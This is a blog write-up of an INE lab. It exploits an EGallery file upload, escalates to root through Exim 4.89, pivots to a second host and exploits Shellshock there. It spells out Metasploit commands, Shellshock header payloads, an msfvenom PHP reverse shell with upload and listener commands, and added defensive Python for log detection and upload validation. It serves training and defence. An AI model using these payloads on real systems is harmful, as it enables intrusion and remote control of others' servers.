June 19, 2022 | 21:00

INE Lab - Linux Remote Exploitation and Post Exploitation

The scenario is described as follows:

In this lab environment, the user will access a Kali GUI instance. A vulnerable application can be accessed using the tools installed on Kali at http://demo.ine.local

Objective: Exploit both the target and find all flags!


First, let’s see if we can find the IP address of our first target in the hosts file:

root@INE:~# cat /etc/hosts | grep ine.local
 demo.ine.local

Next, we take note that the eth1 interface is the route to the target:

root@INE:~# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
                                                UG    0      0        0 eth0
                                                U     0      0        0 eth0
                                                U     0      0        0 eth1

Our IP for interface eth1 is

root@INE:~# ifconfig eth1 | grep "inet"
        inet  netmask  broadcast

Scanning the host reveals an Exim SMTP server version 4.89 on port 25 and an Apache web server version 2.4.7 on port 80. Furthermore, the target is an Ubuntu machine.

root@INE:~# nmap -vv -p- -T4 demo.ine.local
25/tcp open  smtp    syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
root@INE:~# nmap -sV -p25,80 -sV demo.ine.local
25/tcp open  smtp    Exim smtpd 4.89
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

When browsing to the website, we are greeted with a PHP image gallery web application called EGallery:


Searching for exploits, we only see one of relevance, which is a ready-to-use Metasploit module:

root@INE:~# searchsploit egallery | grep EGallery
EGallery - Arbitrary '.PHP' File Upload (Metasploit)          | php/webapps/20029.rb

The exploit works and leads to an unprivileged Meterpreter session as the www-data user:

msf6 > use exploit/unix/webapp/egallery_upload_exec
msf6 exploit(unix/webapp/egallery_upload_exec) > set rhosts demo.ine.local
msf6 exploit(unix/webapp/egallery_upload_exec) > set targeturi /
msf6 exploit(unix/webapp/egallery_upload_exec) > set lhost eth1
msf6 exploit(unix/webapp/egallery_upload_exec) > exploit
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : demo.ine.local
OS          : Linux demo.ine.local 5.4.0-121-generic #137-Ubuntu SMP Sun Jun 19 13:33:07 UTC 2022 x86_64
Meterpreter : php/linux

We find a first flag:

meterpreter > cat THIS_IS_FLAG5234234324/FLAG1

From our initial nmap scan, we remember that the target also runs an Exim 4.89 service. Searchsploit shows a privilege escalation exploit that might work:

root@INE:~# searchsploit exim privilege escalation
Exim 4.87 - 4.91 - Local Privilege Escalation                | linux/local/46996.sh
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)   | linux/local/47307.rb

The exploit works when using a stageless payload, and we have successfully escalated our privileges to root:

msf6 > use exploit/linux/local/exim4_deliver_message_priv_esc
msf6 exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1
msf6 exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost eth1
msf6 exploit(linux/local/exim4_deliver_message_priv_esc) > set payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/exim4_deliver_message_priv_esc) > exploit
meterpreter > getuid
Server username: root

And we find a second flag:

meterpreter > cat /root/FLAG2


Besides the IP that we saw within our hosts file, the host demo.ine.local has a second interface:

meterpreter > shell
ifconfig eth1 | grep inet
          inet addr:  Bcast:  Mask:

And the corresponding subnet is

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         linux                           UG    0      0        0 eth0
                *                               U     0      0        0 eth0
                *                               U     0      0        0 eth1

Let’s add a route to that subnet:

meterpreter > run autoroute -s

We then proceed with a TCP scan of the hosts on that subnet and discover two new hosts with IP addresses and

msf6 exploit(linux/local/exim4_deliver_message_priv_esc) > use auxiliary/scanner/portscan/tcp 
msf6 auxiliary(scanner/portscan/tcp) > set rhosts
msf6 auxiliary(scanner/portscan/tcp) > set ports 1-1000
msf6 auxiliary(scanner/portscan/tcp) > set threads 100
msf6 auxiliary(scanner/portscan/tcp) > run

[+]        - - TCP OPEN
[+]        - - TCP OPEN
[+]        - - TCP OPEN
[+]        - - TCP OPEN

The host has port 80 open, so we use a SOCKS proxy to access it.

msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvhost
msf6 auxiliary(server/socks_proxy) > set srvport 1080
msf6 auxiliary(server/socks_proxy) > run

In another terminal, we modify the proxychains configuration to match Metasploit’s SOCKS proxy and start a browser:

root@INE:~# sudo sed -i "s/socks4.*/socks5 1080/g" /etc/proxychains4.conf

There is an Apache server running and we now know the name of that second target, which is demo2.ine.local:

root@INE:~# proxychains nmap -Pn -sT -p80 -sV
80/tcp open  http    Apache httpd 2.2.22
Service Info: Host: demo2.ine.local

Let’s try to look at the web application:

root@INE:~# proxychains firefox

We can see a web application called AttackDefense and it embeds an iframe from the path /cgi-bin/stats:


The CGI program is vulnerable to Shellshock:

root@INE:~# proxychains nmap -Pn -sT -p80 --script http-shellshock --script-args uri=/cgi-bin/stats
80/tcp open  http
| http-shellshock: 
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.

We can send our own commands:

root@INE:~# proxychains wget -U "() { foo;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/id" && cat stats && rm stats
uid=33(www-data) gid=33(www-data) groups=33(www-data)
root@INE:~# proxychains wget -U "() { foo;};echo \"Content-type: text/plain\"; echo; echo; /bin/uname -a" && cat stats && rm stats
Linux demo2.ine.local 5.4.0-121-generic #137-Ubuntu SMP Sun Jun 19 13:33:07 UTC 2022 x86_64 GNU/Linux
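The two requests above show what a Shellshock probe looks like from the server's side: mod_cgi copies request headers such as User-Agent and Referer into the CGI's environment, and a header value beginning with a bash function definition (`() {`) is what triggers the bug. The following is an added example, not part of the original write-up or of any tool it uses: a small Python detector that parses Apache combined-format access logs and flags lines whose Referer or User-Agent carries that signature. The log lines are constructed for the example (the client addresses and timestamps are invented), and the log format regex assumes the default combined format.

```python
import re
from typing import Dict, List

# Shellshock (CVE-2014-6271) is triggered by an environment variable whose value
# starts with a bash function definition, "() {", followed by commands to run.
# mod_cgi exports headers like User-Agent and Referer as environment variables,
# so that pattern inside a header is the signature worth alerting on.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache "combined" log format:
#   client - - [time] "request" status size "referer" "user-agent"
# The user-agent group is greedy because Apache escapes embedded quotes as \"
# and the payload seen above contains them.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>.*)"$'
)

# Constructed sample log lines (not taken from the lab): one legitimate visit,
# a probe carrying the payload in User-Agent, one carrying it in Referer, and
# an unrelated request.
SAMPLE_LOG = r'''
10.0.0.5 - - [19/Jun/2022:21:00:01 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/91.0"
10.0.0.9 - - [19/Jun/2022:21:00:07 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 55 "-" "() { foo;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/id"
10.0.0.9 - - [19/Jun/2022:21:00:09 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 120 "() { :;}; /bin/uname -a" "Wget/1.21"
10.0.0.5 - - [19/Jun/2022:21:01:00 +0000] "GET /index.html HTTP/1.1" 200 3000 "-" "curl/7.81.0"
'''.strip().splitlines()


def find_shellshock_attempts(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per log line whose Referer or User-Agent carries a
    bash function definition.  Lines that do not parse are skipped."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("referer", "agent"):
            value = m.group(field)
            if SHELLSHOCK_RE.search(value):
                findings.append({
                    "client": m.group("client"),
                    "time": m.group("time"),
                    "request": m.group("request"),
                    "field": field,
                    "value": value,
                })
                break  # one finding per line is enough for alerting
    return findings


def cgi_targets(findings: List[Dict[str, str]]) -> Dict[str, int]:
    """Count how often each requested path occurs in the findings, which tells a
    responder which CGI scripts were probed and need checking."""
    counts: Dict[str, int] = {}
    for f in findings:
        parts = f["request"].split(" ")
        path = parts[1] if len(parts) > 1 else f["request"]
        counts[path] = counts.get(path, 0) + 1
    return counts


if __name__ == "__main__":
    hits = find_shellshock_attempts(SAMPLE_LOG)
    for h in hits:
        print(f'{h["time"]} {h["client"]} {h["request"]} via {h["field"]}: {h["value"]!r}')
    print(cgi_targets(hits))
```

On the sample input this reports the two probes from 10.0.0.9 (one via User-Agent, one via Referer) against /cgi-bin/stats and nothing for the other lines. A pattern match on the header is a detection aid only; the fix is a patched bash, and a probe that returned 200 with a tiny body, as the `id` request did, deserves the same response as a confirmed compromise.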

The relevant Metasploit module is exploit/multi/http/apache_mod_cgi_bash_env_exec. We use a bind shell, because our attacker machine is not accessible from the target.

msf6 auxiliary(server/socks_proxy) > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhosts
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/stats
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set target Linux x86_64
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x64/meterpreter/bind_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : demo2.ine.local
OS           : Debian 7.11 (Linux 5.4.0-121-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux


Manual Exploitation of EGallery

I wanted to know if there's also an easy way to manually exploit the EGallery vulnerability. I proxied Metasploit through Burp with the following options:

msf6 exploit(unix/webapp/egallery_upload_exec) > set PROXIES HTTP:
msf6 exploit(unix/webapp/egallery_upload_exec) > set ReverseAllowProxy true

The requests look like a simple upload of a PHP reverse shell and its subsequent call:

“Burped request”

We create a PHP reverse shell and prepend <?php to have a valid PHP webpage:

root@INE:~# msfvenom -p php/reverse_php LHOST= LPORT=5555 -f raw > shell.php
root@INE:~# echo "<?php" | cat - shell.php > /tmp/out && mv /tmp/out shell.php

Now we upload our PHP file:

curl -F "Filedata=@./shell.php" demo.ine.local/egallery/uploadify.php

Let’s start a listener:

root@INE:~# nc -nlvp 5555
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on

And as soon as we browse to http://demo.ine.local/shell.php, we’ll get the reverse connection:

Ncat: Connection from
Ncat: Connection from
uid=33(www-data) gid=33(www-data) groups=33(www-data)
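The manual exploit works because uploadify.php stores whatever filename and content it is handed, and the web server then executes the stored .php file. As an added example (not code from the original post or from EGallery), here is the kind of server-side check an upload handler needs: an extension allowlist applied to every extension in the name, a signature check that the bytes are an image of the claimed type, a coarse scan for a PHP open tag inside an otherwise valid image, and a server-chosen random filename. The allowlist, the signature table and the sample inputs are assumptions made for this example.

```python
import os
import secrets
from typing import Optional, Tuple

# Extensions the gallery may store; everything else, .php included, is refused.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

# File signatures used to check that the bytes really are an image of the
# type the name claims (assumed table for this example).
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# Constructed sample inputs: a PNG signature with padding (not a decodable
# image; only the signature matters here) and a PHP file body.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_PHP = b"<?php /* constructed placeholder body */ ?>"


def sniff_image_type(data: bytes) -> Optional[str]:
    """Identify the image type from its leading bytes, or None if unknown."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Decide whether an uploaded file may be stored in the gallery.

    Returns (True, server_chosen_name) or (False, reason).  The client-supplied
    name is never used for storage; it only contributes the extension.
    """
    if os.path.basename(filename) != filename or filename.startswith("."):
        return False, "directory components and hidden names are not allowed"
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension"
    # Every extension must be allowed, so shell.php.jpg and shell.jpg.php both fail.
    for ext in parts[1:]:
        if ext not in ALLOWED_EXT:
            return False, f"extension '{ext}' is not allowed"
    ext = "jpg" if parts[-1] == "jpeg" else parts[-1]
    kind = sniff_image_type(data)
    if kind is None:
        return False, "content is not a recognised image"
    if kind != ext:
        return False, f"content is {kind} but name claims {ext}"
    # A valid image can still carry PHP in a comment chunk; refuse anything that
    # contains a PHP open tag rather than trusting the signature alone.
    if b"<?" in data:
        return False, "embedded PHP open tag"
    # Random server-chosen name: the uploader cannot predict the URL, and the
    # extension is one the web server never hands to the PHP interpreter.
    return True, f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    for name, body in [
        ("shell.php", SAMPLE_PHP),          # the manual exploit's upload
        ("shell.php.png", SAMPLE_PNG),      # double extension
        ("photo.png", SAMPLE_PHP),          # right name, wrong content
        ("photo.png", SAMPLE_PNG + SAMPLE_PHP),  # image with PHP appended
        ("../photo.png", SAMPLE_PNG),       # path traversal in the name
        ("photo.png", SAMPLE_PNG),          # accepted
    ]:
        print(name, "->", validate_upload(name, body))
```

Validation alone is not the whole fix: the upload directory should also sit outside the document root or have script execution disabled in the web server configuration, so that even a file that slips past the checks is served as data rather than run.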

© Pavel Pi 2021